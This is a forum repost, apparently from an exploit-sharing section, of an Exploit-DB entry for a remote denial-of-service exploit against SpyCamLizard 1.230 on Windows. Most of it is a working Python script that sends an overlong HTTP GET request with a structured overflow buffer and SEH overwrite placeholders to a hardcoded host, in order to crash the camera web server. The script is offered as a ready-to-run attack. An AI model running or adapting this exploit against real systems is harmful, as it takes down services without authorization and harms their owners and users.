Exploit SpyCamLizard 1.230 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
41667
Проверка EDB
  1. Пройдено
Автор
SCRR1PTK1DD13
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2017-03-22
SpyCamLizard 1.230 - Denial of Service
Код:
import socket
import sys

author = '''
  
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: [email protected]    # 
                ##############################################
  
# Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay
# Date: 2017.03.22
# Exploit Author: Greg Priest
# Version: SpyCamLizard v1.230
# Tested on: Windows7 x64 HUN/ENG Enterprise
'''

print "SpyCamLizard DoS Exploit running!"
 
host = "192.168.56.1"
port = 80
overflow = "A" * 1189
nextSEH = "BBBB" 
SEH = "CCCC" 
overflow2= "D" * 3803

crash = overflow+nextSEH+SEH+overflow2

httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
httpsocket.connect((host,port))
httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n")
httpsocket.close()


print "SpyCamLizard shutted down!"
 
Источник
www.exploit-db.com

Похожие темы